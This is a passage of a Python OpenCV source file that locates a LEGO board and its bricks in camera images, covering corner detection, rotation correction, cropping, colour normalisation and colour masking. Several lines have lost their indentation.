'Cannot locate exact four board corners: could not find four '
'lines in bitmap.')
# get four reasonable line intersections
corners = list()
for idx1, line1 in enumerate(new_lines):
for idx2, line2 in enumerate(new_lines):
if idx1 >= idx2:
continue
inter_p = line_intersect(line1, line2)
if inter_p == (-1, -1):
continue
dist = zc.euc_dist(inter_p, center)
if dist < perimeter // 3:
corners.append(inter_p)
if len(corners) != 4:
raise NoBoardDetectedError(
'Cannot locate exact four board corners.')
# put the four corners in order
dtype = [('x', float), ('y', float)]
corners = np.array(corners, dtype=dtype)
corners = np.sort(corners, order='y')
if corners[0][0] < corners[1][0]:
ul = corners[0];
ur = corners[1]
else:
ul = corners[1];
ur = corners[0]
if corners[2][0] < corners[3][0]:
bl = corners[2];
br = corners[3]
else:
bl = corners[3];
br = corners[2]
ul = list(ul)
ur = list(ur)
bl = list(bl)
br = list(br)
# some sanity check here
len_b = zc.euc_dist(bl, br)
len_u = zc.euc_dist(ul, ur)
len_l = zc.euc_dist(ul, bl)
len_r = zc.euc_dist(ur, br)
# check that the lengths are not TOO dissimilar
if not (0.8 <= (len_b / len_u) <= 1.2) \
or not (0.8 <= (len_l / len_r) <= 1.2):
raise NoBoardDetectedError(
'Cannot locate exact four board corners: difference between '
'opposing edges exceeds 20%.')
elif method == 'point':
bw = bw.astype(bool)
row_mtx, col_mtx = np.mgrid[0: bw.shape[0], 0: bw.shape[1]]
row_mtx = row_mtx[bw]
col_mtx = col_mtx[bw]
row_plus_col = row_mtx + col_mtx
ul_idx = np.argmin(row_plus_col)
ul = (col_mtx[ul_idx], row_mtx[ul_idx])
br_idx = np.argmax(row_plus_col)
br = (col_mtx[br_idx], row_mtx[br_idx])
row_minus_col = row_mtx - col_mtx
ur_idx = np.argmin(row_minus_col)
ur = (col_mtx[ur_idx], row_mtx[ur_idx])
bl_idx = np.argmax(row_minus_col)
bl = (col_mtx[bl_idx], row_mtx[bl_idx])
else:
raise RuntimeError(f'Unrecognized method {method}.')
corners = np.float32([ul, ur, bl, br])
return corners
def calc_thickness(corners, stretch_ratio):
corners_tmp = corners.copy()
ul = corners_tmp[0]
ul[1] *= stretch_ratio
ur = corners_tmp[1]
ur[1] *= stretch_ratio
bl = corners_tmp[2]
bl[1] *= stretch_ratio
br = corners_tmp[3]
br[1] *= stretch_ratio
len_b = zc.euc_dist(bl, br)
um = (ul + ur) / 2
seen_board_height = zc.calc_triangle_area(bl, br, um) * 2 / len_b
real_board_height = len_b * config.BOARD_RECONSTRUCT_HEIGHT / \
config.BOARD_RECONSTRUCT_WIDTH
real_brick_height = real_board_height / config.BOARD_RECONSTRUCT_HEIGHT * \
config.BRICK_HEIGHT
seen_brick_height = seen_board_height / config.BOARD_RECONSTRUCT_HEIGHT * \
config.BRICK_HEIGHT
S_theta = seen_brick_height / real_brick_height # sin theta
if S_theta >= 1:
C_theta = 0
else:
C_theta = (1 - S_theta * S_theta) ** 0.5
real_brick_thickness = real_brick_height / \
config.BRICK_HEIGHT_THICKNESS_RATIO
seen_brick_thickness = real_brick_thickness * C_theta
seen_brick_thickness /= stretch_ratio
return seen_brick_thickness
def get_rotation_degree(bw):
lines = cv2.HoughLinesP(bw, 1, np.pi / 180, 6, minLineLength=8,
maxLineGap=5)
if lines is None:
return None
lines = lines[0]
if len(lines) > 60:
return None
# plotting lines, for testing only ############################
# img = np.zeros((bw.shape[0], bw.shape[1], 3), dtype=np.uint8)
# for line in lines:
# pt1 = (line[0], line[1])
# pt2 = (line[2], line[3])
# cv2.line(img, pt1, pt2, (255, 255, 255), 1)
# cv2.namedWindow('bw')
# display_image('bw', bw)
# cv2.namedWindow('test')
# display_image('test', img)
################################################################
degrees = np.zeros(len(lines))
for line_idx, line in enumerate(lines):
x_diff = line[0] - line[2]
y_diff = line[1] - line[3]
if x_diff == 0:
degree = np.pi / 2 # TODO
else:
degree = np.arctan(float(y_diff) / x_diff)
degrees[line_idx] = degree * 180 / np.pi
# get an angle in (-45, 45]
if degrees[line_idx] <= 0:
degrees[line_idx] += 90
if degrees[line_idx] > 45:
degrees[line_idx] -= 90
# now use RANSAC like algorithm to get the consensus
max_vote = 0
consensus_degree = None
for degree in degrees:
n_vote = 0
for degree_cmp in degrees:
angle_diff = zc.angle_dist(degree, degree_cmp, angle_range=90)
if abs(angle_diff) < 5:
n_vote += 10 - abs(angle_diff)
if n_vote > max_vote:
max_vote = n_vote
consensus_degree = degree
best_degree = 0
for degree_cmp in degrees:
angle_diff = zc.angle_dist(consensus_degree, degree_cmp, angle_range=90)
if abs(angle_diff) < 5:
best_degree += angle_diff * (10 - abs(angle_diff))
best_degree = best_degree / max_vote + consensus_degree
if best_degree > 45:
best_degree -= 90
if best_degree <= -45:
best_degree += 90
return best_degree
def rotate(img, n_iterations=2):
    '''
    Assuming the major line patterns in an image are vertical and horizontal,
    this function tries to correct the rotation so that vertical lines are
    really vertical and horizontal lines are really horizontal.
    '''
img_ret = img
rotation_degree = 0
rotation_mtx = None
for iteration in range(
n_iterations): # Sometimes need multiple iterations to get the
# rotation right
bw = cv2.cvtColor(img_ret, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(bw, 50, 100)
rotation_degree_tmp = get_rotation_degree(edges)
if rotation_degree_tmp is None:
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot get rotation degree'}
# return (rtn_msg, None)
raise LEGOCVError('Cannot get rotation degree.')
weight = 1
for i in range(3):
bw[:] = img_ret[:, :, i][:]
edges = cv2.Canny(bw, 50, 100)
d = get_rotation_degree(edges)
if d is not None:
rotation_degree_tmp += d
weight += 1
rotation_degree_tmp /= weight
rotation_degree += rotation_degree_tmp
# print rotation_degree
img_shape = img.shape
M = cv2.getRotationMatrix2D((img_shape[1] / 2, img_shape[0] / 2),
rotation_degree, scale=1)
rotation_mtx = M
img_ret = cv2.warpAffine(img, M, (img_shape[1], img_shape[0]))
return img_ret, rotation_degree, rotation_mtx
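# Editor's note, a short usage sketch (`img_board` is a placeholder name):
#
#   corrected, degree, M = rotate(img_board)
#   # `corrected` has its line patterns axis-aligned, `degree` is the total
#   # correction applied, and `M` is the 2x3 affine matrix from
#   # cv2.getRotationMatrix2D, reusable with cv2.warpAffine.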
def crop(img, borders):
shape = img.shape
is_color = (len(shape) == 3 and shape[2] > 1)
if borders is None:
if is_color:
bw = zc.get_mask(img)
else:
bw = img
rows, cols = np.nonzero(bw)
min_row = min(rows);
max_row = max(rows)
min_col = min(cols);
max_col = max(cols)
else:
min_row, max_row, min_col, max_col = borders
if is_color:
img_cropped = img[min_row: max_row + 1, min_col: max_col + 1, :]
else:
img_cropped = img[min_row: max_row + 1, min_col: max_col + 1]
return img_cropped, (min_row, max_row, min_col, max_col)
def smart_crop(img):
bw = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, bi = cv2.threshold(bw, 0, 1, cv2.THRESH_BINARY)
    # TODO: has a risk that the sum here may exceed the uint8 range...
sum_0 = bi.sum(axis=0)
sum_1 = bi.sum(axis=1)
i_start = 0;
i_end = bi.shape[0] - 1;
j_start = 0;
j_end = bi.shape[1] - 1
i_start_cmp_val = sum_1[int(round(config.BRICK_HEIGHT / 4.0 * 2))] * 0.6
while sum_1[i_start] < i_start_cmp_val:
i_start += 1
i_end_cmp_val = sum_1[bi.shape[0] - 1 - int(
round(config.BRICK_HEIGHT / 4.0 * 2))] * 0.6
while sum_1[i_end] < i_end_cmp_val:
i_end -= 1
j_start_cmp_val = sum_0[int(round(config.BRICK_WIDTH / 4.0 * 2))] * 0.6
while sum_0[j_start] < j_start_cmp_val:
j_start += 1
j_end_cmp_val = sum_0[bi.shape[1] - 1 - int(
round(config.BRICK_WIDTH / 4.0 * 2))] * 0.6
while sum_0[j_end] < j_end_cmp_val:
j_end -= 1
# print (bi.shape, i_start, i_end, j_start, j_end)
return img[i_start: i_end + 1, j_start: j_end + 1, :], (
i_start, i_end, j_start, j_end)
################################ COLOR #########################################
def normalize_brightness(img, mask=None, method='hist', max_percentile=100,
min_percentile=0):
shape = img.shape
if mask is None:
mask = np.ones((shape[0], shape[1]), dtype=bool)
if mask.dtype != bool:
mask = mask.astype(bool)
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
v = hsv[:, :, 2]
if method == 'hist':
hist, bins = np.histogram(v.flatten(), 256, [0, 256])
hist[0] = 0
cdf = hist.cumsum()
cdf_m = np.ma.masked_equal(cdf, 0)
cdf_m = (cdf_m - cdf_m.min()) * 255 / (cdf_m.max() - cdf_m.min())
cdf = np.ma.filled(cdf_m, 0).astype('uint8')
v_ret = cdf[v]
elif method == 'max':
max_v = np.percentile(v[mask], max_percentile)
min_v = np.percentile(v[mask], min_percentile)
v[np.bitwise_and((v < min_v), mask)] = min_v
        # What exactly is convertScaleAbs doing here? And why the abs?
v_ret = cv2.convertScaleAbs(v, alpha=254.0 / (max_v - min_v),
beta=-(min_v * 254.0 / (max_v - min_v) - 2))
v[mask] = v_ret[mask]
v_ret = v
else:
raise RuntimeError(f'Unrecognized method {method}.')
hsv[:, :, 2] = v_ret
img_ret = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
return img_ret
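# Editor's note: the 'hist' branch above is a masked histogram equalisation --
# a brightness value whose cumulative fraction is e.g. 0.25 is remapped to
# roughly 0.25 * 255 ~= 64 -- while the 'max' branch linearly rescales the V
# channel between the chosen percentiles.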
def normalize_color(img, mask_info=None, mask_apply=None, method='hist',
max_percentile=100, min_percentile=0):
shape = img.shape
if mask_info is None:
mask_info = np.ones((shape[0], shape[1]), dtype=bool)
if mask_info.dtype != bool:
mask_info = mask_info.astype(bool)
if mask_apply is None:
mask_apply = mask_info
if mask_apply.dtype != bool:
mask_apply = mask_apply.astype(bool)
img_ret = img.copy()
if method == 'hist': # doesn't work well for over-exposed images
for i in range(3):
v = img[:, :, i]
hist, bins = np.histogram(v[mask_info].flatten(), 256, [0, 256])
cdf = hist.cumsum()
cdf_m = np.ma.masked_equal(cdf, 0)
cdf_m = (cdf_m - cdf_m.min()) * 255 / (cdf_m.max() - cdf_m.min())
cdf = np.ma.filled(cdf_m, 0).astype('uint8')
v[mask_apply] = cdf[v[mask_apply]]
img_ret[:, :, i] = v
elif method == 'grey':
img = img.astype(float)
max_rgb = 0
for i in range(3):
v = img[:, :, i]
# print v[mask_info].mean()
v[mask_apply] = v[mask_apply] / v[mask_info].mean()
img[:, :, i] = v
if v[mask_apply].max() > max_rgb:
max_rgb = v[mask_apply].max()
img[mask_apply, :] = img[mask_apply, :] * 255 / max_rgb
img = img.astype(np.uint8)
img_ret = img
elif method == 'select_grey':
img = img.astype(np.int64)
mask_blue_over_exposed = (img[:, :, 0] >= 250)
mask_green_over_exposed = (img[:, :, 1] >= 250)
mask_red_over_exposed = (img[:, :, 2] >= 250)
# print "Blue over exposure: %d" % mask_blue_over_exposed.sum()
mask_over_bright = ((img[:, :, 0] + img[:, :, 1] + img[:, :, 2]) >= 666)
mask_over_exposed = np.bitwise_and(zc.super_bitwise_or((
mask_blue_over_exposed,
mask_green_over_exposed,
mask_red_over_exposed)),
mask_over_bright)
# print "Over exposure: %d" % mask_over_bright.sum()
mask_info = np.bitwise_and(mask_info, np.invert(mask_over_exposed))
img = img.astype(float)
max_rgb = 0
for i in range(3):
v = img[:, :, i]
v[mask_apply] = v[mask_apply] / v[mask_info].mean()
img[:, :, i] = v
if v[mask_apply].max() > max_rgb:
max_rgb = v[mask_apply].max()
img[mask_apply, :] = img[mask_apply, :] * 255 / max_rgb
img = img.astype(np.uint8)
img = normalize_brightness(img, mask=mask_apply, max_percentile=90,
method='max')
img[mask_over_exposed, 0] = 255
img[mask_over_exposed, 1] = 255
img[mask_over_exposed, 2] = 255
img_ret = img
elif method == 'max':
# b, g, r = cv2.split(img)
# img = cv2.merge((b, g, r))
for i in range(3):
v = img[:, :, i]
            # note: the original referenced an undefined `mask` here; the
            # apply mask is assumed, mirroring normalize_brightness()
            max_v = np.percentile(v[mask_apply], max_percentile)
            min_v = np.percentile(v[mask_apply], min_percentile)
v[v < min_v] = min_v
v_ret = cv2.convertScaleAbs(v, alpha=220.0 / (max_v - min_v),
beta=-(min_v * 220.0 / (
max_v - min_v) - 35))
            # convertScaleAbs keeps the single-channel 2-D shape here, so the
            # original channel indexing [:, :, 0] is not needed
            v[mask_apply] = v_ret[mask_apply]
img_ret[:, :, i] = v
else:
raise RuntimeError(f'Unrecognized method {method}.')
return img_ret
# def color_inrange(img, color_space, hsv=None,
# B_L=0, B_U=255,
# G_L=0, G_U=255,
# R_L=0, R_U=255,
# H_L=0, H_U=179,
# S_L=0, S_U=255,
# V_L=0, V_U=255):
# if color_space == 'BGR':
# lower_range = np.array([B_L, G_L, R_L], dtype=np.uint8)
# upper_range = np.array([B_U, G_U, R_U], dtype=np.uint8)
# mask = cv2.inRange(img, lower_range, upper_range)
# elif color_space == 'HSV':
# if hsv is None:
# hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
# lower_range = np.array([H_L, S_L, V_L], dtype=np.uint8)
# upper_range = np.array([H_U, S_U, V_U], dtype=np.uint8)
# mask = cv2.inRange(hsv, lower_range, upper_range)
# return mask
# def detect_color(img_hsv, color, on_surface=False):
# '''
# detect the area in @img_hsv with a specific @color, and return the @mask
# @img_hsv is the input in HSV color space
# @color is a string, describing color
# Currently supported colors: Black, White
# In OpenCV HSV space, H is in [0, 179], the other two are in [0, 255]
# '''
# if color == "black":
# mask1_1 = color_inrange(None, 'HSV', hsv=img_hsv[0], V_U=50)
# mask1_2 = color_inrange(None, 'HSV', hsv=img_hsv[1], S_U=60)
# mask1 = cv2.bitwise_and(mask1_1, mask1_2)
# mask2_1 = color_inrange(None, 'HSV', hsv=img_hsv[0], V_U=20)
# mask2_2 = color_inrange(None, 'HSV', hsv=img_hsv[1], S_U=100)
# mask2 = cv2.bitwise_and(mask2_1, mask2_2)
# mask = cv2.bitwise_or(mask1, mask2)
# elif color == "white":
# mask = color_inrange(None, 'HSV', hsv=img_hsv, S_U=60, V_L=190)
# else:
# print("ERROR: color detection has specified an undefined color!!!!")
#
# return mask
def gen_mask_for_color(hsv_img: np.ndarray,
color: SimpleHSVColor,
mask_src: np.ndarray,
on_surface=False):
mask_nothing = np.zeros(mask_src.shape, dtype=np.uint8)
mask_color = color.get_mask(hsv_img)
mask_color = cv2.bitwise_and(mask_color, mask_src)
mask_color_bool = mask_color.astype(bool)
if np.any(mask_color_bool) and has_a_brick(mask_color, min_area=20,
min_span=5):
S_mean = np.median(hsv_img[mask_color_bool, 1])
# S_mean is in a 0-255 scale, convert it to 0 - 100
S_mean = (S_mean / 255.0) * 100.0
tmp_color = SimpleHSVColor(
low_bound=HSVValue(hue=color.low_bound.hue,
saturation=int(S_mean * 0.7),
value=color.low_bound.value),
high_bound=color.high_bound
)
# mask_color = color_inrange(None, 'HSV', hsv=hsv, H_L=45, H_U=96,
# S_L=int(S_mean * 0.7))
mask_color = tmp_color.get_mask(hsv_img)
if not has_a_brick(cv2.bitwise_and(mask_color, mask_src),
min_area=20, min_span=5):
mask_color = mask_nothing
if on_surface:
V_ref = np.percentile(hsv_img[mask_color_bool, 2], 75)
# mask_green_on = color_inrange(img, 'HSV', hsv=hsv, H_L=45, H_U=96,
# S_L=int(S_mean * 0.7),
# V_L=V_ref * 0.75)
# v_ref is also on a 0-255 scale...
V_ref = (V_ref / 255.0) * 100.0
tmp_color = SimpleHSVColor(
low_bound=HSVValue(hue=color.low_bound.hue,
saturation=int(S_mean * 0.7),
value=int(V_ref * 0.75)),
high_bound=color.high_bound
)
mask_color_on = tmp_color.get_mask(hsv_img)
mask_color = (mask_color, mask_color_on)
else:
mask_color = mask_nothing if not on_surface else (
mask_nothing, mask_nothing)
return mask_color
def detect_colors(img, mask_src, on_surface=False):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
if mask_src is None:
mask_src = np.ones(img.shape[0:2], dtype=np.uint8) * 255
# mask_nothing = np.zeros(mask_src.shape, dtype=np.uint8)
mask_green = gen_mask_for_color(hsv, LEGOColorGreen, mask_src, on_surface)
mask_yellow = gen_mask_for_color(hsv, LEGOColorYellow, mask_src, on_surface)
mask_red = gen_mask_for_color(hsv, LEGOColorRed, mask_src, on_surface)
mask_blue = gen_mask_for_color(hsv, LEGOColorBlue, mask_src, on_surface)
return mask_green, mask_red, mask_yellow, mask_blue
# detect green
# mask_green = color_inrange(img, 'HSV', hsv=hsv, H_L=45, H_U=96, S_L=80)
# mask_green = LEGOColorGreen.get_mask(hsv)
# mask_green = cv2.bitwise_and(mask_green, mask_src)
# mask_green_bool = mask_green.astype(bool)
# if np.any(mask_green_bool) and has_a_brick(mask_green, min_area=20,
# min_span=5):
# S_mean = np.median(hsv[mask_green_bool, 1])
# mask_green = color_inrange(img, 'HSV', hsv=hsv, H_L=45, H_U=96,
# S_L=int(S_mean * 0.7))
# if not has_a_brick(cv2.bitwise_and(mask_green, mask_src), min_area=20,
# min_span=5):
# mask_green = mask_nothing
# if on_surface:
# V_ref = np.percentile(hsv[mask_green_bool, 2], 75)
# mask_green_on = color_inrange(img, 'HSV', hsv=hsv, H_L=45, H_U=96,
# S_L=int(S_mean * 0.7),
# V_L=V_ref * 0.75)
# mask_green = (mask_green, mask_green_on)
# else:
# mask_green = mask_nothing if not on_surface else (
# mask_nothing, mask_nothing)
# # detect yellow
# mask_yellow = color_inrange(img, 'HSV', hsv=hsv, H_L=8, H_U=45, S_L=90)
# mask_yellow = cv2.bitwise_and(mask_yellow, mask_src)
# mask_yellow_bool = mask_yellow.astype(bool)
# if np.any(mask_yellow_bool) and has_a_brick(mask_yellow, min_area=20,
# min_span=5):
# S_mean = np.median(hsv[mask_yellow_bool, 1])
# mask_yellow = color_inrange(img, 'HSV', hsv=hsv, H_L=8, H_U=45,
# S_L=int(S_mean * 0.7))
# if not has_a_brick(cv2.bitwise_and(mask_yellow, mask_src),
# min_area=20,
# min_span=5):
# mask_yellow = mask_nothing
# if on_surface:
# V_ref = np.percentile(hsv[mask_yellow_bool, 2], 75)
# mask_yellow_on = color_inrange(img, 'HSV', hsv=hsv, H_L=8, H_U=45,
# S_L=int(S_mean * 0.7),
# V_L=V_ref * 0.75)
# mask_yellow = (mask_yellow, mask_yellow_on)
# else:
# mask_yellow = mask_nothing if not on_surface else (
# mask_nothing, mask_nothing)
# # detect red
# mask_red1 = color_inrange(img, 'HSV', hsv=hsv, H_L=0, H_U=10, S_L=105)
# mask_red2 = color_inrange(img, 'HSV', hsv=hsv, H_L=160, H_U=179, S_L=105)
# mask_red = cv2.bitwise_or(mask_red1, mask_red2)
# mask_red = cv2.bitwise_and(mask_red, mask_src)
# mask_red_bool = mask_red.astype(bool)
# if np.any(mask_red_bool) and has_a_brick(mask_red, min_area=20,
# min_span=5):
# S_mean = np.median(hsv[mask_red_bool, 1])
# mask_red1 = color_inrange(img, 'HSV', hsv=hsv, H_L=0, H_U=10,
# S_L=int(S_mean * 0.7))
# mask_red2 = color_inrange(img, 'HSV', hsv=hsv, H_L=160, H_U=179,
# S_L=int(S_mean * 0.7))
# mask_red = cv2.bitwise_or(mask_red1, mask_red2)
# if not has_a_brick(cv2.bitwise_and(mask_red, mask_src), min_area=20,
# min_span=5):
# mask_red = mask_nothing
# if on_surface:
# V_ref = np.percentile(hsv[mask_red_bool, 2], 75)
# mask_red1_on = color_inrange(img, 'HSV', hsv=hsv, H_L=0, H_U=10,
# S_L=int(S_mean * 0.7),
# V_L=V_ref * 0.75)
# mask_red2_on = color_inrange(img, 'HSV', hsv=hsv, H_L=160,
# H_U=179,
# S_L=int(S_mean * 0.7),
# V_L=V_ref * 0.75)
# mask_red_on = cv2.bitwise_or(mask_red1_on, mask_red2_on)
# mask_red = (mask_red, mask_red_on)
# else:
# mask_red = mask_nothing if not on_surface else (
# mask_nothing, mask_nothing)
# # detect blue
# mask_blue = color_inrange(img, 'HSV', hsv=hsv, H_L=93, H_U=140, S_L=125)
# mask_blue = cv2.bitwise_and(mask_blue, mask_src)
# mask_blue_bool = mask_blue.astype(bool)
# if np.any(mask_blue_bool) and has_a_brick(mask_blue, min_area=20,
# min_span=5):
# S_mean = np.median(hsv[mask_blue_bool, 1])
# mask_blue = color_inrange(img, 'HSV', hsv=hsv, H_L=93, H_U=140,
# S_L=int(S_mean * 0.8))
# if not has_a_brick(cv2.bitwise_and(mask_blue, mask_src), min_area=20,
# min_span=5):
# mask_blue = mask_nothing
# if on_surface:
# V_ref = np.percentile(hsv[mask_blue_bool, 2], 75)
# mask_blue_on = color_inrange(img, 'HSV', hsv=hsv, H_L=93, H_U=140,
# S_L=int(S_mean * 0.8),
# V_L=V_ref * 0.75)
# mask_blue = (mask_blue, mask_blue_on)
# else:
# mask_blue = mask_nothing if not on_surface else (
# mask_nothing, mask_nothing)
def detect_colorful(img, on_surface=False):
lower_bound = [0, 100, 20]
upper_bound = [179, 255, 255]
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
lower_range = np.array(lower_bound, dtype=np.uint8)
upper_range = np.array(upper_bound, dtype=np.uint8)
mask = cv2.inRange(img_hsv, lower_range, upper_range)
return mask
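# Editor's note: detect_colorful simply keeps pixels that are reasonably
# saturated and not too dark (S >= 100, V >= 20 over the full hue range); in
# _detect_lego below it is OR-ed with the inverted-edge mask as a cheap
# "any LEGO colour" cue.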
##################### Some major functions #########################
def _locate_board(img, display_list):
## Find some black
DoB = zc.get_DoB(img, config.BLUR_KERNEL_SIZE, 1, method='Average')
# zc.check_and_display('DoB', DoB, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# mask_black = color_inrange(DoB, 'HSV', V_L=config.BLACK_DOB_MIN_V)
mask_black = LEGOColorDOBMaskBlack.get_mask(DoB)
# zc.check_and_display('mask_black', mask_black, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## 1. find black dots (somewhat black, and small)
## 2. find area where black dots density is high
if 'mask_black_dots' in display_list:
mask_black_dots = np.zeros(mask_black.shape, dtype=np.uint8)
contours, hierarchy = cv2.findContours(mask_black, mode=cv2.RETR_CCOMP,
method=cv2.CHAIN_APPROX_NONE)
bd_counts = np.zeros((config.BD_COUNT_N_ROW,
config.BD_COUNT_N_COL)) # count black dots in each
# block
for cnt_idx, cnt in enumerate(contours):
if len(cnt) > config.BD_MAX_PERI or (hierarchy[0, cnt_idx, 3] != -1):
continue
if config.CHECK_BD_SIZE == 'complete':
max_p = cnt.max(axis=0)
min_p = cnt.min(axis=0)
diff_p = max_p - min_p
if diff_p.max() > config.BD_MAX_SPAN:
continue
mean_p = cnt.mean(axis=0)[0]
bd_counts[int(mean_p[1] / config.BD_BLOCK_HEIGHT), int(
mean_p[0] / config.BD_BLOCK_WIDTH)] += 1
if 'mask_black_dots' in display_list:
cv2.drawContours(mask_black_dots, contours, cnt_idx, 255, -1)
if 'mask_black_dots' in display_list:
zc.display_image('mask_black_dots', mask_black_dots,
wait_time=config.DISPLAY_WAIT_TIME,
resize_max=config.DISPLAY_MAX_PIXEL,
save_image=config.SAVE_IMAGE)
## find a point that we are confident is in the board
# print bd_counts
max_idx = bd_counts.argmax()
i, j = zc.ind2sub((config.BD_COUNT_N_ROW, config.BD_COUNT_N_COL), max_idx)
if bd_counts[i, j] < config.BD_COUNT_THRESH:
        raise LEGOCVError('Too few black dots, maybe the image is blurred')
# return (rtn_msg, None, None, None)
in_board_p = (
(i + 0.5) * config.BD_BLOCK_HEIGHT, (j + 0.5) * config.BD_BLOCK_WIDTH)
## locate the board by finding the contour that is likely to be of the board
closest_cnt = zc.get_closest_contour(contours, hierarchy, in_board_p,
min_span=config.BD_BLOCK_SPAN,
hierarchy_req='inner')
if closest_cnt is None or (not zc.is_roughly_convex(closest_cnt)):
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot locate board border, maybe not the full '
# 'board is in the scene. Failed at stage 1'}
# return (rtn_msg, None, None, None)
raise NoBoardDetectedError('Stage 1: Could not locate board border in '
'frame.')
hull = cv2.convexHull(closest_cnt)
mask_board = np.zeros(mask_black.shape, dtype=np.uint8)
cv2.drawContours(mask_board, [hull], 0, 255, -1)
## polish the board border in case the background is close to black
cv2.drawContours(mask_board, [hull], 0, 255, 5)
img_tmp = img.copy()
img_tmp[np.invert(mask_board.astype(bool)), :] = 180
DoB = zc.get_DoB(img_tmp, config.BLUR_KERNEL_SIZE, 1, method='Average')
# mask_black = color_inrange(DoB, 'HSV', V_L=config.BLACK_DOB_MIN_V)
mask_black = LEGOColorDOBMaskBlack.get_mask(DoB)
contours, hierarchy = cv2.findContours(mask_black, mode=cv2.RETR_CCOMP,
method=cv2.CHAIN_APPROX_NONE)
closest_cnt = zc.get_closest_contour(contours, hierarchy, in_board_p,
min_span=config.BD_BLOCK_SPAN,
hierarchy_req='inner')
if closest_cnt is None or (not zc.is_roughly_convex(closest_cnt)):
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot locate board border, maybe not the
# full '
# 'board is in the scene. Failed at stage 2'}
# return (rtn_msg, None, None, None)
raise NoBoardDetectedError('Stage 2: Could not locate board border in '
'frame. ')
hull = cv2.convexHull(closest_cnt)
mask_board = np.zeros(mask_black.shape, dtype=np.uint8)
cv2.drawContours(mask_board, [hull], 0, 255, -1)
img_board = np.zeros(img.shape, dtype=np.uint8)
img_board = cv2.bitwise_and(img, img, dst=img_board, mask=mask_board)
# zc.check_and_display('board_original', img_board, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## sanity checks
if mask_board[int(in_board_p[0]), int(in_board_p[1])] == 0:
# print(in_board_p)
# rtn_msg = {'status' : 'fail',
# 'message': 'Best board candidate fails sanity check, '
# 'black dots are not inside the board...'}
# # return (rtn_msg, None, None, None)
raise NoBoardDetectedError('Best candidate failed sanity check.')
return hull, mask_board, img_board
def _detect_lego(img_board, display_list, method='edge', edge_th=[80, 160],
mask_black_dots=None, mask_lego_rough=None, add_color=True):
if method == 'edge':
bw_board = cv2.cvtColor(img_board, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(bw_board, edge_th[0], edge_th[1], apertureSize=3)
# zc.check_and_display('board_edge', edges, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
edges = cv2.morphologyEx(edges, cv2.MORPH_CLOSE,
zc.generate_kernel(7, 'circular'),
iterations=1) # magic kernel size
edges = cv2.morphologyEx(edges, cv2.MORPH_OPEN,
zc.generate_kernel(3, 'square'), iterations=1)
mask_rough = cv2.bitwise_not(edges)
if add_color:
mask_color = detect_colorful(img_board)
mask = cv2.bitwise_or(mask_rough, mask_color)
else:
mask = mask_rough
# zc.check_and_display('edge_inv', mask, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
elif method == 'dots':
mask = cv2.morphologyEx(mask_black_dots, cv2.MORPH_CLOSE,
zc.generate_kernel(11, 'square'),
iterations=1) # magic kernel size
mask = cv2.bitwise_not(mask)
elif method == 'fill': # This is not finished. Not working well with
# initial tests. Don't use it.
img = img_board.copy()
mask_black_dots_bool = mask_black_dots.astype(bool)
img[mask_black_dots_bool, :] = 0
kernel = zc.generate_kernel(3, method='circular')
for iter in range(1):
img_tmp = cv2.dilate(img, kernel, iterations=1)
img[mask_black_dots_bool] = img_tmp[mask_black_dots_bool]
mask_black_dots = cv2.erode(mask_black_dots, kernel, iterations=1)
mask_black_dots_bool = mask_black_dots.astype(bool)
bw_board = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(bw_board, 100, 200, apertureSize=3)
return img, edges
# In case the large border of board is considered to be the best candidate
if mask_lego_rough is not None:
mask = cv2.bitwise_and(mask, mask_lego_rough)
mask_lego, _ = zc.find_largest_CC(mask,
min_area=config.BOARD_RECONSTRUCT_AREA
/ 300.0,
min_convex_rate=0.2,
ref_p=config.BOARD_RECONSTRUCT_CENTER,
max_dist_ref_p=config.BOARD_RECONSTRUCT_PERI / 15.0)
if mask_lego is None:
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot find a large enough foreground near
# the '
# 'center of board'}
# return (rtn_msg, None, None)
raise NoLEGODetectedError('Cannot find a large enough foreground near '
'the center of the board.')
img_lego = np.zeros(img_board.shape, dtype=np.uint8)
img_lego = cv2.bitwise_and(img_board, img_board, dst=img_lego,
mask=mask_lego)
return img_lego, mask_lego
def _find_lego(img, stretch_ratio, display_list):
######################## detect board ######################################
hull, mask_board, img_board = _locate_board(img, display_list)
## some properties of the board
board_area = cv2.contourArea(hull)
if board_area < config.BOARD_MIN_AREA:
# rtn_msg = {'status': 'fail', 'message': 'Detected board too small'}
# return (rtn_msg, None)
raise NoBoardDetectedError('Detected board too small.')
M = cv2.moments(hull)
board_center = (
int(M['m01'] / M['m00']),
int(M['m10'] / M['m00'])) # in (row, col) format
board_perimeter = cv2.arcLength(hull, True)
# print "Board statistics: area: %d, center: %s, perimeter: %d" % (
# board_area, board_center, board_perimeter)
## find the perspective correction matrix
board_border = np.zeros(mask_board.shape, dtype=np.uint8)
cv2.drawContours(board_border, [hull], 0, 255, 1)
corners = get_corner_pts(board_border, board_perimeter, board_center,
method='line')
if corners is None:
raise NoBoardDetectedError('Cannot locate exact four board corners.')
thickness = int(calc_thickness(corners,
stretch_ratio) * 0.8) # TODO: should be
# able to be more accurate
# print "Brick thickness: %d pixels" % thickness
if config.OPT_FINE_BOARD:
# first get a rough perspective matrix
